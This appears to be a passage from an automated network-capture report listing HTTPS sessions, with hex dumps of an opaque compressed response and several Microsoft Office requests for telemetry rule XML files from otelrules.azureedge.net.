                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 67 95 35 16 76 17 95 45 34 79 e0 81 1f 44 43 74 91 10 31 62 7c e2 2f 01 12 f2 95 e8 d7 24 c4 9d d8 bc ff 1f a7 e5 bf fb 24 bd 27 59 b2 08 6d d9 92 2c c9 b1 e3 c4 b2 ad c8 c1 81 74 93 81 cd 2c 36 8b 90 a5 4e 69 b6 e5 f9 29 21 66 97 e7 b4 b3 2d 4f 11 3e 20 27 3f cf cf 9a 7f cf d5 a7 92 bc 98 bc c9 4c 32 93 97 e4 e5 65 44 57 d9 65 97 15 63 59 d8 c5 a5 e2 f3 ff 87 2a d4 a9 d3 42 9d f6 0b fd 0a d5 2d 35 a3 d4 8c 2f 66 19 ff ff 69 9a de f7 ff cc ff 33 ac 61 69 24 db b2 25 5b 36 cb 80 4b f6 02 60 80 c0 61 07 78 83 ec b6 09 3b 05 4c d8 a7 71 4e 5d 76 79 0b ec 02 6f 43 08 ff cf f3 67 fe 3a bb 33 05 a7 f2 ad 94 49 95 0a 1c 64 a0 97 9f bc 5a fa 94 fc ef 7b 2b ad f6 40 02 65 46 56 f7 cc b4 d4 39 32 46 c8 75 81 a3 e5 56 69 db d7 39 f7 fd c5 7d ef 7f b3 79 df 3d 16 df
                                                                                        Data Ascii: g5vE4yDCt1b|/$$'Ym,t,6Ni)!f-O> '?L2eDWecY*B-5/fi3ai$%[6K`ax;LqN]vyoCg:3IdZ{+@eFV92FuVi9}y=
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 21 a8 00 1d a1 07 f4 84 5e d0 1b fa 40 5f e8 07 fd 61 00 0c 84 41 30 18 86 c0 50 18 06 c3 61 04 8c 84 51 30 1a c6 c0 58 18 07 e3 61 02 4c cc 57 22 5f ab 7c ad f3 b5 c9 d7 2e df 6a cd 4f 8b d0 1c 5a 56 ad 81 d6 52 6b a7 cd d2 e6 39 ff 27 3e 4b aa 9e d4 3d e9 7d b2 92 5c 31 b9 61 f2 fa e4 8d c9 db 52 4a a4 0c 4f 39 92 72 57 0f d2 e3 f5 42 7a 31 bd 8a 5e c3 e8 67 0c 30 66 18 8b 8c 15 c6 46 e3 b5 e1 c4 08 cc 8f 05 b1 2c 56 c6 36 d8 11 fb e2 00 1c 88 43 71 04 8e c4 d1 38 15 a7 e3 2c 5c 8c ab 70 1d 6e c4 2d 78 00 cf e2 15 7c 84 6f f1 07 fe 45 13 d3 c8 4e 01 24 28 9a 8a 53 49 2a 47 55 a9 31 75 a5 1e 34 88 86 d2 70 9a 4a 33 68 01 ad a0 55 b4 9a d6 d3 46 da 43 07 e9 10 1d a1 53 74 8e ee d0 07 fa 42 1a 77 e6 31 3c 85 55 9e cd f3 78 29 af e5 0d bc 95 77 f1 09 be cc
                                                                                        Data Ascii: !^@_aA0PaQ0XaLW"_|.jOZVRk9'>K=}\1aRJO9rWBz1^g0fF,V6Cq8,\pn-x|oEN$(SI*GU1u4pJ3hUFCStBw1<Ux)w
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 0b df 99 63 35 16 2d 33 c7 ea 2c da 66 8e 35 58 f4 e9 1c 6b b2 b8 fd 1c 6b b1 78 d6 1c 6b b3 78 b5 39 d6 61 f1 a5 73 ac cb e2 cb e7 58 8f c5 d7 8c 61 7d 96 4c 60 c9 44 6c c0 92 7d 68 4c 1b b1 e4 0e 96 dc 85 8d 59 f2 12 4b 5e c6 69 dc a8 f0 18 b6 a0 d1 83 46 6f 6c 49 63 34 0d b1 2d 8d b1 34 c6 63 b8 ab 31 9b c6 dc a3 ab b1 0c 8d 65 f1 18 37 77 7e cc d1 86 e6 ae 43 b4 a6 79 2c cd e3 f0 19 37 cf e0 39 f6 a0 79 de 10 7b d2 bc 94 e6 e5 98 ec 6a be 47 f3 43 dc c5 cd 05 c7 1c 07 92 3a cf 71 10 69 c4 1c 5d 48 a3 be f2 a5 96 71 9a c6 43 1c 4c 9a 4d 9a 83 b5 38 6d c8 73 b4 24 6d 36 c7 61 a4 9d c6 08 b7 90 76 26 ed 8a c3 49 bb 11 ca e3 ef 4e da 0b 47 91 f6 21 ed 8b e3 48 fb f1 1e 3a 9e b4 3f e9 00 9c 40 3a 94 74 14 4e 22 1d 43 3a 16 67 90 4e a0 31 9c 45 3a 95 74 26
                                                                                        Data Ascii: c5-3,f5Xkkxkx9asXa}L`Dl}hLYK^iFolIc4-4c1e7w~Cy,79y{jGC:qi]HqCLM8ms$m6av&ING!H:?@:tN"C:gN1E:t&
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 9e ef 38 39 f7 cc 29 37 2f 29 15 4a ea 37 af 66 9d 7c a9 54 ba b5 74 ab d4 c3 27 c4 76 e4 c1 13 2e e7 50 a2 89 ec f8 6f 49 f5 b5 39 e1 72 13 57 5a 9e 8c c7 e3 f1 73 65 d3 b3 e7 53 d8 82 29 7a 35 42 7e 5f 69 1d 85 a1 ee 67 9b 3a d2 4a 47 2a e2 06 37 d2 54 27 dc f0 4a 16 29 a5 fb b8 11 7d 7d 6e f0 50 07 dc 88 bb 69 32 18 e8 cd 78 53 c7 5a eb 24 fd df 15 b6 4e 55 54 e4 be 7d a4 24 4d b5 d6 9b 75 ae 49 91 17 03 bd 55 e4 d9 c4 b5 2c 4c 60 53 72 13 13 c7 76 37 36 9b 0b 40 28 76 aa 9a 40 a4 aa 41 e4 0a c3 f0 2a b5 a0 ba aa ff 51 10 c0 af d5 43 c1 28 33 84 23 bd 30 2c eb 46 0d 63 42 ec 9a 26 51 b5 1a 44 52 72 e6 fb b5 40 59 96 0b 53 cb 72 97 c0 24 8e ed 4a ce b1 c9 a5 28 97 98 c1 4b 02 98 69 0a b7 de 68 2f fa be 6d 92 8e 6b 59 96 e5 c6 84 73 cb 10 42 0a ca 18 37
                                                                                        Data Ascii: 89)7/)J7f|Tt'v.PoI9rWZseS)z5B~_ig:JG*7T'J)}}nPi2xSZ$NUT}$MuIU,L`Srv76@(v@A*QC(3#0,FcB&QDRr@YSr$J(Kih/mkYsB7
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: de fe ec e1 55 f1 bb f7 ff 0f 86 a0 94 71 21 c4 6c ea 01 78 30 12 42 70 78 8e 10 82 df 76 1b 17 42 08 4a d9 c4 f6 7d 7b c2 28 15 31 52 55 46 23 f8 14 8c 50 88 56 b2 b6 d3 77 22 51 27 b3 dc 7d 27 d4 d8 cd 5c e1 60 83 38 eb 6c 22 db 0c b7 e7 9b a6 7f c1 03 46 b5 66 30 ce a3 f7 8d 9a 38 c4 34 c3 29 ed a1 82 f6 78 e5 89 84 51 2a 80 cf 1e cb e2 1b 60 f4 e7 66 36 7d 7c 8c ca f3 3d d8 84 09 3a 84 2e c2 63 46 ff 38 d4 51 a0 27 96 12 a7 e2 7c 80 c8 ec 15 26 d2 6e f7 73 d9 31 70 b2 69 76 16 56 52 60 03 47 9d fd 0b a5 72 5b 27 43 d8 7c 52 92 04 8d b9 9b 76 fd 85 fa 26 94 d5 89 20 cd 46 65 61 a1 43 9b b4 14 e1 19 53 90 2b 3b 62 84 e6 53 8c 60 8a 4e a2 9b 10 02 16 b1 14 a9 48 a1 29 f8 f2 81 94 fc db b0 0e 32 0f 36 66 44 b3 33 c3 10 43 1e 21 49 93 54 25 3c 73 3d ba 32
                                                                                        Data Ascii: Uq!lx0BpxvBJ}{(1RUF#PVw"Q'}'\`8l"Ff084)xQ*`f6}|=:.cF8Q'|&ns1pivVR`Gr['C|Rv& FeaCS+;bS`NH)26fD3C!IT%<s=2
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 8c 3d fe cc 53 3b 70 35 c1 e6 d5 cb b5 2a e0 e5 7d 87 cf 4e d6 75 55 04 10 a9 2e 18 85 d3 c0 1a be b6 23 8f f3 52 6f 29 5e 3f bc 6f 19 ef 4d 20 52 dd ae 8a c0 f7 c8 ff 0c 76 e0 43 e8 69 a9 04 97 5b 56 9b 3a ca 0a 94 d8 33 af b5 7b ec 62 a6 42 26 dc eb 22 fb 4d bd 07 b8 cc 82 d2 a9 9f 5f 46 b0 a9 25 69 a1 b9 4e f8 13 9b 94 30 2a 17 0f 60 a8 35 ea aa ea 4a c3 1d 16 27 fc 6a 2d 60 14 83 34 47 3e 28 8e e4 16 40 e0 07 72 bb 7d 9f 7f e2 dc 6e bb c3 e2 84 13 46 42 72 83 50 c7 91 76 10 d8 8c 6d b7 e1 3a d9 08 2c db aa b8 c0 2d bb 54 5e 6c 2e 8d aa 91 20 26 e7 18 80 09 47 4a 83 51 4c c0 e0 06 36 dd 8f 22 63 23 a5 04 30 7a e4 c7 95 dc 20 84 50 dc 6a 99 25 fe f0 f0 63 98 a0 18 93 0c 44 9e 14 85 84 82 08 ca 45 13 ec 91 9a 72 d0 67 ca e7 18 dc ef 09 97 7c cb 12 e6 f4
                                                                                        Data Ascii: =S;p5*}NuU.#Ro)^?oM RvCi[V:3{bB&"M_F%iN0*`5J'j-`4G>(@r}nFBrPvm:,-T^l. &GJQL6"c#0z Pj%cDErg|
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 9a 8d 46 58 2f 71 d3 ae 54 02 e8 76 fb 44 6f 9e 37 d2 9b 44 df 57 4e 61 0a 53 74 0c 21 5f a5 83 4f 18 2c 1f 59 14 7a a0 b9 0e 75 a1 07 3a 57 6a 50 9d c5 df 51 ba d0 d5 20 a6 e4 0b 40 85 5a e9 81 4e 75 f8 3f 27 4f 9e a4 f4 0c a3 bb 94 9e fc d6 65 98 9d 61 60 9c bc ec 5b df ba ec a4 01 ec 0c c3 97 7d 0b 9e b4 be be 4e e9 01 8c 0f 50 ba 7e fa 25 ff be 7e 93 81 0f 60 76 96 c1 c6 fa 4b 5e b2 be 01 ec 2c c3 07 b0 71 d3 fa bf bf e4 34 42 88 20 34 f7 03 d6 55 50 0d e5 08 f5 04 b4 89 f1 95 5b 69 92 f6 3c cf eb 68 8f 70 41 1b 0f ea f5 0e 8e cc 7e a0 0b 58 71 64 e0 4a 29 83 50 ba 86 e1 cc 7e 0c d3 8b 06 83 01 94 97 1b 51 28 1c 47 84 51 bd ec 4a 71 e0 f3 86 94 41 24 5d d7 0d 85 e3 18 ff 3c 1b c1 74 3e c6 7d d5 86 2b 23 b5 b0 10 29 29 19 13 97 89 2b 7d c5 af b8 84 40
                                                                                        Data Ascii: FX/qTvDo7DWNaSt!_O,Yzu:WjPQ @ZNu?'Oea`[}NP~%~`vK^,q4B 4UP[i<hpA~XqdJ)P~Q(GQJqA$]<t>}+#))+}@
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 00 7e 1c fb 87 8c c3 86 e9 38 66 70 c7 1d 77 dc f1 ca ed 67 08 31 09 d9 1d 47 dc 15 ee c2 13 78 12 df 8d 67 f0 0b f8 3d 6a d2 88 a6 84 8c 8a a4 c8 e7 92 6e b9 50 33 35 0b 9a ab b2 42 a5 2a 5f 0f e5 db 01 79 db ec f6 c2 66 92 35 93 2a 2d 8a 0a ea 48 25 b2 cb 03 17 a5 4a b3 f5 b9 91 54 a1 12 f2 e7 27 6a 12 25 49 a2 86 7f e4 27 9b 64 52 a5 ef 9d 50 4e a2 8b 98 b2 44 85 52 0e 53 77 12 15 47 81 7e 31 51 61 f4 ec cb e4 f2 43 3e 86 d5 db 81 ea b6 b0 3d 89 92 c7 ce 34 99 96 60 30 46 a5 a6 c9 44 25 2a 2e a7 55 a5 16 65 a2 a4 76 63 5a 3e cd 9d 57 6a 56 2e aa 46 a1 de 0e 14 b7 4d 17 66 65 f5 a8 f3 4b 3d e3 a2 60 72 6b e6 b3 42 e6 d2 41 66 31 0d c9 8b 52 4d e7 73 35 93 3e 34 50 04 c7 c2 f5 99 96 4a 48 f7 4b f7 a2 52 2a 4e b2 d1 d5 a5 8a 93 a2 92 a8 3a ed 9c 42 5e 15
                                                                                        Data Ascii: ~8fpwg1Gxg=jnP35B*_yf5*-H%JT'j%I'dRPNDRSwG~1QaC>=4`0FD%*.UevcZ>WjV.FMfeK=`rkBAf1RMs5>4PJHKR*N:B^
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 7f 79 d1 8b 5e f4 c2 a7 b6 bf b5 7d d3 f7 be f7 bd 7f f9 e5 77 bf fb dd 6f 43 8a 0f 5d 5a cc bf 0a ff 05 df 42 4f 40 a8 97 0c b4 de f2 5e f1 62 82 8e 6e c6 04 ae b0 c6 dc 12 78 11 a9 13 f0 01 83 ad 41 32 15 0d c4 25 d8 58 5f 14 c0 9f 76 3c cf 71 9a ad d5 0b cf 3b 6f 41 62 22 29 75 aa aa d5 c5 38 ea b6 30 76 a4 a4 18 db 96 69 db e5 b2 5b 62 98 38 9e e7 3a 04 07 65 e1 18 06 00 70 a3 cc ad 52 c5 0f 03 21 4b 1c 53 29 84 00 db 76 38 7d e2 62 ab d5 5b 5d 5d ed 74 dd 60 b1 79 fe 52 d2 6a 38 4e d2 6c f9 91 65 01 f6 00 18 37 0d 4a c3 7a 3d f4 6c ab e2 59 84 f9 81 ef 87 f5 4e ad cc 0d af ec 12 e6 56 2a 96 59 e2 b6 5f 2e 03 8b 54 c5 24 84 73 8c 85 6d 5b 26 a5 08 21 86 d0 9c b7 32 b4 84 5a 68 1b 9d 44 bb 08 f5 44 58 40 ba d8 2a 9d f6 ce 8b 4e a7 03 d0 c0 81 68 7d fe
                                                                                        Data Ascii: y^}woC]ZBO@^bnxA2%X_v<q;oAb")u80vi[b8:epR!KS)v8}b[]]t`yRj8Nle7Jz=lYNV*Y_.T$sm[&!2ZhDDX@*Nh}


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        115192.168.2.44988113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:58 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:58 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 958
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                        x-ms-request-id: 8a5e2199-d01e-0014-3f2b-2ced58000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124658Z-16ccfc49897774xmhC1DFWuraw00000000e0000000002z7m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:58 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        116192.168.2.44988013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:58 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:58 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                        x-ms-request-id: 5d06df95-b01e-0084-4008-2cd736000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124658Z-16dc884887blxdnjhC1DFWpw2s00000000fg0000000026v8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:58 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        117192.168.2.44988213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:58 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:58 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1952
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                        x-ms-request-id: b900ecb1-f01e-0099-29eb-2b9171000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124658Z-16ccfc498974hjqwhC1DFW7uyn00000000gg0000000020k0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:58 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        118192.168.2.44988313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:58 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:58 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 501
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                        x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124658Z-16ccfc49897774xmhC1DFWuraw00000000hg000000002r3f
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:58 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        119192.168.2.44987913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:58 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:58 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 174
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                        x-ms-request-id: f6167466-801e-0078-0d47-2cbac6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124658Z-176bd8f9bc55l2dfhC1DFWw03w00000000q00000000025a6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:58 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        120192.168.2.44988413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:59 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:59 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:59 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2592
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                        x-ms-request-id: bab6baff-801e-002a-7024-2c31dc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124659Z-159b85dff8flhtkwhC1DFWeu9n00000000w000000000b463
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:59 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
